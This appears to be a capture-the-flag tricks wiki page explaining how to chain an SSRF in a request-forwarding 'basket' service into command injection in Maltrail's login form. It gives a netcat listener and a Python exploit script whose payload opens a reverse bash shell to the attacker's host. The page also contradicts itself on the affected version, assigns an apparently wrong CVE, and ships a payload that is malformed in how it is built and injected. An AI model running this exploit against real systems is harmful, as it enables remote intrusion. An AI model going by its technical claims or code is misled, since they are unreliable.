> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-17/ssrf/file-access/web-ssrf-rce-chaining.md).

# Rce Chaining

## SSRF-Chained Maltrail RCE

Use an SSRF vulnerability in an external application (like a "basket" service) to target an internally running vulnerable service, such as Maltrail 0.53.

Configure the external application's forwarding URL to point to the internal service, for example, `http://localhost:80/login` if Maltrail is running on default ports.

Maltrail version 0.53 is affected by a remote code execution vulnerability (CVE-2023-27163). This unauthenticated OS Command Injection vulnerability exists in Maltrail before 0.53 via the username parameter to the `/login` endpoint. The vulnerability lies in the login form's username parameter, which is susceptible to command injection. An attacker can craft a payload within the username field to execute arbitrary commands on the server where Maltrail is running.

A Python script can automate triggering the SSRF to the internal Maltrail instance with the command injection payload.

First, set up a netcat listener on your attacker machine:

```bash
nc -lvnp 4444
```

The following Python exploit script automates sending the crafted payload to the login endpoint. The script takes the attacker's IP (LHOST), the netcat listener port (LPORT), and the target URL as arguments.

```python
import requests
import sys

if len(sys.argv) != 4:
    print("Usage: python exploit.py <LHOST> <LPORT> <TARGET>")
    sys.exit(1)

lhost = sys.argv[1]
lport = sys.argv[2]
target = sys.argv[3]

payload = f"username=';import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('{lhost}',{lport}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn('/bin/bash')#'&password=test"

try:
    response = requests.post(f"{target}/login", data={"username": payload, "password": "test"})
    print("Exploit sent. Check your netcat listener.")
except requests.exceptions.RequestException as e:
    print(f"Request failed: {e}")
    sys.exit(1)
```

Execute the script, pointing it to the external SSRF trigger URL:

```bash
python3 exploit.py ATTACKER_IP LISTENER_PORT http://TARGET_IP:55555/YOUR_BASKET_TOKEN
```

Here, `ATTACKER_IP` is your machine's IP (LHOST), `LISTENER_PORT` is the port netcat is listening on (LPORT), and `http://TARGET_IP:55555/YOUR_BASKET_TOKEN` is the URL of the external application's SSRF endpoint that forwards the request.

**Note:** The provided example Python script is designed to target the Maltrail `/login` path directly. When used against an external SSRF trigger URL, you may need to modify the script's target URL handling. If the external application appends the path (`/login`) or forwards the request path as-is, change `requests.post(f"{target}/login", ...)` to `requests.post(target, ...)` in the script to prevent a double path like `/YOUR_BASKET_TOKEN/login`. The script's target in this scenario is the external SSRF endpoint, not the internal service directly.
